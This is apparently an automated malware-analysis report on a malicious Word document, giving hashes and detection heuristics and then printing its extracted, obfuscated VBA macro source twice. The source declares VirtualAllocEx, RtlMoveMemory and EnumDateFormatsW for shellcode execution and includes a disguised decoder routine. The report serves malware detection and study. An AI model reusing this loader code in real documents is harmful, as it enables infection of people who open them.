Office (OLE) malware analysis — malicious · b5cc444b9c2bd43c

MALICIOUS

Office (OLE)

155.5 KB Created: 2016-11-01 14:32:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 15a17dccd93b12a5460daa993260dc90 SHA-1: 2f4e828446fe42c23c8be0cbda0b0ea265ae0725 SHA-256: b5cc444b9c2bd43c47d65a057484fb5ded898ca61be195d02b7b23292bd806e2

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter

The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6589607-0. Static analysis revealed VBA macros that utilize the VirtualAlloc API, a common technique for memory allocation to execute shellcode or download additional payloads. The presence of auto-execution code in the VBA macros suggests an attempt to immediately run malicious functions upon opening the document.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6589607-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6589607-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7656 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7656 bytes
SHA-256: `2e2aad20bfb44b690a8562d53e178c0b8434cbf580cdb53c80ef4324f2be6719`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "appeal" 'I can't watch things further complicate #If VBA6 And Win64 Then 'I'd like to think there's more something more Public Type columnea 'I can't watch things further complicate elseifstatement As LongPtr 'as soon as I escape there's more stagnant bullsshit End Type 'I'm lost in this place it's such a waste Public Declare PtrSafe Function geopolitics Lib "kernel32" Alias "VirtualAllocEx" (smelt As LongPtr, ByVal diffluent As LongPtr, ByVal bourbon As LongPtr, ByVal customfall As LongPtr, ByVal noncompliance As LongPtr) As LongPtr 'all the thoughts in my head are constantly .. haunting me Public Declare PtrSafe Function consortship Lib "user32" Alias "EndPaint" (cruelty As LongPtr,abito As LongPtr) As LongPtr 'I hope that I don't bore you while I whine about it Public Declare PtrSafe Function verre Lib "kernel32" Alias "Sleep" (bucharest As LongPtr) 'all the thoughts in my head are constantly .. haunting me Public Declare PtrSafe Function carabineer Lib "user32" Alias "GetUpdateRect" (crossexamine As LongPtr, liftoff As LongPtr,auburn As LongPtr) As Boolean 'I hope that I don't bore you while I whine about it Public Declare PtrSafe Function doublespeak Lib "user32" Alias "SetParent" (ByVal chimneystack As LongPtr, ByVal lasciate As LongPtr,comes As LongPtr) As LongPtr 'I hope you won't be saddened while I cry about it Public Declare PtrSafe Function roar Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal flags As Any, ByVal lParam As Any) As LongPtr 'I hope you won't be saddened while I cry about it Public Declare PtrSafe Sub tho Lib "ntdll.dll" Alias "RtlMoveMemory" (descriptive As Any, attache As Any, ByVal manfulness As LongPtr) 'all the thoughts in my head are constantly .. haunting me Public Declare PtrSafe Function salvelinus Lib "user32" Alias "OpenClipboard" (monstrously As LongPtr) As Boolean 'Everyday I wake up to stagnant bullshit 'ï»¿I can't take another complication #Else 'ï»¿I can't take another complication Public Declare Function frizzly Lib "user32" Alias "EndPaint" (honeybee As Long, flapping As Long) As Long 'ï»¿I can't take another complication Public Declare Function cauterizer Lib "user32" Alias "GetUpdateRect" (sandlot As Long, lopholatilus As Long, inhabiting As Long) As Boolean 'ï»¿I can't take another complication Public Declare Sub tho Lib "ntdll.dll" Alias "RtlMoveMemory" (impeccable As Any, facinus As Any, ByVal daubentonia As Long) 'ï»¿I can't take another complication Public Declare Function shoe Lib "user32" Alias "SetParent" (ByVal abuser As Long, ByVal unexcitingly As Long, fossiliferous As Long) As Long 'ï»¿I can't take another complication Public Declare Function geopolitics Lib "kernel32" Alias "VirtualAllocEx" (ceruse As Long, ByVal durables As Long, ByVal ornithogalum As Long, ByVal arthralgic As Long, ByVal hock As Long) As Long 'ï»¿I can't take another complication Public Declare Function atlas Lib "user32" Alias "OpenClipboard" (newsworthiness As Long) As Boolean 'as soon as I escape there's more stagnant bullsshit Public Declare Function diol Lib "kernel32" Alias "Sleep" (dubiety As Long) 'Everyday I wake up to stagnant bullshit Public Declare Function roar Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal studied As Any, ByVal lParam As Any) As Long 'Everyday I wake up to stagnant bullshit 'I can't watch things further complicate #End If 'as soon as I escape there's more stagnant bullsshit Function disregarded(potence, selfglorification) disregarded = potence * selfglorification End Function Function backward(austereness, rondo) backward = austereness And rondo End Function Function applique(acropolis, bankruptcy) applique = acropolis \ bankruptcy End Function Sub selectr() Dim curSel With Documents("yourDocument.doc") If Selection.Type <> wdSelectionIP Then Set curSel = Selection.Range Selection.Collapse Direction:=wdCollapseStart End If End With End Sub Function lip(bloodstock) As String Dim cocotte As Integer baize = kidding And 301 Dim calculator() As Byte Dim intelligibility(63) As Long Dim unappeasable As Long Dim arytenoid As Variant Dim afterdamp As Long Dim epitome(63) As Long Dim illdigested As Variant certificated = singleleaf Dim diversification(63) As Long Dim tollitur(5525) As Byte Dim earned As Long Dim asymptoptic As String Dim down(255) As Byte Dim madrigalist As Long Dim living As Variant Dim tiffin As Byte shagginess = 31 + 225 development = 255 lapidescence = 63 acuity = 122 - 30 - 121 + 4125 aborticide = 127 + 32 + 10 + 65367 Dim deepread As Variant Dim nonagenarian As Byte negligent = 68 + 13 + 257967 frightful = 16515072 chorizagrotis = 78 + 16711602 fissipedia = 6 + 58 bullshit = 65280 bacterially = 86 - 18 + 262076 pediculus = 86 + 3946 Dim barring As Integer Dim musales(7367) As Byte coursing = 123 + 7245 For osteomalacia = 1 To coursing vivacious = Mid(bloodstock, osteomalacia, 1) parsimonia = "derivable" trichomoniasis = "heavyduty" cystic = (Asc(vivacious)) musales(osteomalacia - 1) = cystic Next Dim prohibition As String For nondescript = 46 To 63 attainment = 63 certificated = "capacity" counterfire = UCase$("ke") & Mid("araliaceaerchithieve", 11, 4) & Mid("codefpiqueerer", 4, 2) counterfire = Right$("ruledde", 2) & UCase$("INON") & UCase$("YchUs") Next nondescript downbow = 7367 veloute = 40 + 54 + 97 - 156 For dipstick = 0 To downbow musales(dipstick) = musales(dipstick) + 4 Next dipstick concede = 98 glitz = 59 If concede + glitz < 21 Then concede = Left("taugreenling", 3) & Left("tophobaste", 5) & Right$("stolenny", 2) certificated = "activation" bayonets = LCase$("Ch") & LCase$("OKra") Else singleleaf = "brahminic" glitz = 35 End If cocotte = 0 charmingly = 27 + 95 amplifier = 48 + 207 For unappeasable = 0 To amplifier Select Case unappeasable Case 65 To 90 down(unappeasable) = unappeasable - 65 Case 97 To charmingly down(unappeasable) = unappeasable - 71 Case 48 To 57 down(unappeasable) = unappeasable + 4 Case 43 down(unappeasable) = 62 Case 47 down(unappeasable) = 63 End Select Next unappeasable For unappeasable = 0 To 63 diversification(unappeasable) = disregarded(unappeasable, fissipedia) epitome(unappeasable) = disregarded(unappeasable, acuity) intelligibility(unappeasable) = disregarded(unappeasable, bacterially) Next unappeasable feint = 8 While feint < 13 feint = feint + 1 certificated = singleleaf Wend calculator = musales dockage = 4 aetas = 74 clotted = 98 If aetas + clotted < 2 Then aetas = LCase$("Me") & UCase$("nS") singleleaf = "bawdy" unobtrusive = "re" & Right$("contradictorinessgle", 3) Else drivein = drivein / 397 clotted = 8 End If pericarp = 3 singleleaf = certificated kidding = baize \ 180 connivance = pericarp + 1 capriciously = 2 For madrigalist = 0 To downbow puzzled = calculator(madrigalist) earned = intelligibility(down(puzzled)) _ + epitome(down(calculator(madrigalist + 1))) + diversification(down(calculator(madrigalist + 2))) + down(calculator(madrigalist + pericarp)) unappeasable = backward(earned, chorizagrotis) tollitur(afterdamp) = applique(unappeasable, aborticide) unappeasable = backward(earned, bullshit) tollitur(afterdamp + 1) = applique(unappeasable, shagginess) tollitur(afterdamp + capriciously) = backward(earned, development) afterdamp = afterdamp + capriciously + 1 madrigalist = madrigalist + 3 Next lip = tollitur End Function

SHA-256: 2e2aad20bfb44b690a8562d53e178c0b8434cbf580cdb53c80ef4324f2be6719

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "appeal"
'I can't watch things further complicate
#If VBA6 And Win64 Then
'I'd like to think there's more something more
Public Type columnea
'I can't watch things further complicate
elseifstatement As LongPtr
'as soon as I escape there's more stagnant bullsshit
End Type
'I'm lost in this place it's such a waste
Public  Declare PtrSafe Function geopolitics Lib "kernel32" Alias "VirtualAllocEx" (smelt As LongPtr, ByVal diffluent As LongPtr, ByVal bourbon As LongPtr, ByVal customfall As LongPtr, ByVal noncompliance As LongPtr) As LongPtr
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function consortship Lib "user32" Alias "EndPaint" (cruelty As LongPtr,abito As LongPtr) As LongPtr
'I hope that I don't bore you while I whine about it
Public Declare PtrSafe Function verre Lib "kernel32" Alias "Sleep" (bucharest As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function carabineer Lib "user32" Alias "GetUpdateRect" (crossexamine As LongPtr, liftoff As LongPtr,auburn As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public Declare PtrSafe Function doublespeak Lib "user32" Alias "SetParent" (ByVal chimneystack As LongPtr, ByVal lasciate As LongPtr,comes As LongPtr) As LongPtr
'I hope you won't be saddened while I cry about it
Public  Declare PtrSafe Function roar Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal flags As Any, ByVal lParam As Any) As LongPtr
'I hope you won't be saddened while I cry about it
Public  Declare PtrSafe Sub tho Lib "ntdll.dll" Alias "RtlMoveMemory" (descriptive As Any, attache As Any, ByVal manfulness As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function salvelinus Lib "user32" Alias "OpenClipboard" (monstrously As LongPtr) As Boolean
'Everyday I wake up to stagnant bullshit

'ï»¿I can't take another complication
#Else
'ï»¿I can't take another complication
Public Declare Function frizzly Lib "user32" Alias "EndPaint" (honeybee As Long, flapping As Long) As Long
'ï»¿I can't take another complication
Public Declare Function cauterizer Lib "user32" Alias "GetUpdateRect" (sandlot As Long, lopholatilus As Long, inhabiting As Long) As Boolean
'ï»¿I can't take another complication
Public Declare Sub tho Lib "ntdll.dll" Alias "RtlMoveMemory" (impeccable As Any, facinus As Any, ByVal daubentonia As Long)
'ï»¿I can't take another complication
Public Declare Function shoe Lib "user32" Alias "SetParent" (ByVal abuser As Long, ByVal unexcitingly As Long, fossiliferous As Long) As Long
'ï»¿I can't take another complication
Public Declare Function geopolitics Lib "kernel32" Alias "VirtualAllocEx" (ceruse As Long, ByVal durables As Long, ByVal ornithogalum As Long, ByVal arthralgic As Long, ByVal hock As Long) As Long
'ï»¿I can't take another complication
Public Declare Function atlas Lib "user32" Alias "OpenClipboard" (newsworthiness As Long) As Boolean
'as soon as I escape there's more stagnant bullsshit
Public Declare Function diol Lib "kernel32" Alias "Sleep" (dubiety As Long)
'Everyday I wake up to stagnant bullshit
Public Declare Function roar Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal studied As Any, ByVal lParam As Any) As Long
'Everyday I wake up to stagnant bullshit

'I can't watch things further complicate
#End If
'as soon as I escape there's more stagnant bullsshit
Function disregarded(potence, selfglorification)
disregarded = potence * selfglorification
End Function
Function backward(austereness, rondo)
backward = austereness And rondo
End Function
Function applique(acropolis, bankruptcy)
applique = acropolis \ bankruptcy
End Function
Sub selectr()
    Dim curSel
    With Documents("yourDocument.doc")
        If Selection.Type <> wdSelectionIP Then
            Set curSel = Selection.Range
            Selection.Collapse Direction:=wdCollapseStart
        End If
    End With
End Sub

Function lip(bloodstock) As String
Dim cocotte As Integer
baize = kidding And 301

Dim calculator() As Byte
Dim intelligibility(63) As Long
Dim unappeasable As Long
Dim arytenoid As Variant

Dim afterdamp As Long
Dim epitome(63) As Long
Dim illdigested As Variant

certificated = singleleaf

Dim diversification(63) As Long
Dim tollitur(5525) As Byte
Dim earned As Long
Dim asymptoptic As String
Dim down(255) As Byte
Dim madrigalist As Long
Dim living As Variant

Dim tiffin As Byte

shagginess = 31 + 225
development = 255
lapidescence = 63
acuity = 122 - 30 - 121 + 4125
aborticide = 127 + 32 + 10 + 65367
Dim deepread As Variant

Dim nonagenarian As Byte

negligent = 68 + 13 + 257967
frightful = 16515072
chorizagrotis = 78 + 16711602
fissipedia = 6 + 58
bullshit = 65280
bacterially = 86 - 18 + 262076
pediculus = 86 + 3946
Dim barring As Integer
Dim musales(7367) As Byte
coursing = 123 + 7245
For osteomalacia = 1 To coursing
vivacious = Mid(bloodstock, osteomalacia, 1)
parsimonia = "derivable"
trichomoniasis = "heavyduty"
cystic = (Asc(vivacious))
musales(osteomalacia - 1) = cystic
Next
Dim prohibition As String
For nondescript = 46 To 63
attainment = 63
certificated = "capacity"
counterfire = UCase$("ke") & Mid("araliaceaerchithieve", 11, 4) & Mid("codefpiqueerer", 4, 2)
counterfire = Right$("ruledde", 2) & UCase$("INON") & UCase$("YchUs")
Next nondescript

downbow = 7367
veloute = 40 + 54 + 97 - 156
For dipstick = 0 To downbow
musales(dipstick) = musales(dipstick) + 4
Next dipstick
concede = 98
glitz = 59
If concede + glitz < 21 Then
concede = Left("taugreenling", 3) & Left("tophobaste", 5) & Right$("stolenny", 2)
certificated = "activation"
bayonets = LCase$("Ch") & LCase$("OKra")
Else
singleleaf = "brahminic"
glitz = 35
End If

cocotte = 0
charmingly = 27 + 95
amplifier = 48 + 207
For unappeasable = 0 To amplifier
Select Case unappeasable
Case 65 To 90
down(unappeasable) = unappeasable - 65
Case 97 To charmingly
down(unappeasable) = unappeasable - 71
Case 48 To 57
down(unappeasable) = unappeasable + 4
Case 43
down(unappeasable) = 62
Case 47
down(unappeasable) = 63
End Select
Next unappeasable
For unappeasable = 0 To 63
diversification(unappeasable) = disregarded(unappeasable, fissipedia)
epitome(unappeasable) = disregarded(unappeasable, acuity)
intelligibility(unappeasable) = disregarded(unappeasable, bacterially)
Next unappeasable
feint = 8
While feint < 13
feint = feint + 1
certificated = singleleaf
Wend

calculator = musales
dockage = 4
aetas = 74
clotted = 98
If aetas + clotted < 2 Then
aetas = LCase$("Me") & UCase$("nS")
singleleaf = "bawdy"
unobtrusive = "re" & Right$("contradictorinessgle", 3)
Else
drivein = drivein / 397
clotted = 8
End If

pericarp = 3
singleleaf = certificated

kidding = baize \ 180

connivance = pericarp + 1
capriciously = 2
For madrigalist = 0 To downbow
puzzled = calculator(madrigalist)
earned = intelligibility(down(puzzled)) _
 + epitome(down(calculator(madrigalist + 1))) + diversification(down(calculator(madrigalist + 2))) + down(calculator(madrigalist + pericarp))
unappeasable = backward(earned, chorizagrotis)
tollitur(afterdamp) = applique(unappeasable, aborticide)
unappeasable = backward(earned, bullshit)
tollitur(afterdamp + 1) = applique(unappeasable, shagginess)
tollitur(afterdamp + capriciously) = backward(earned, development)
afterdamp = afterdamp + capriciously + 1
madrigalist = madrigalist + 3
Next
lip = tollitur
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.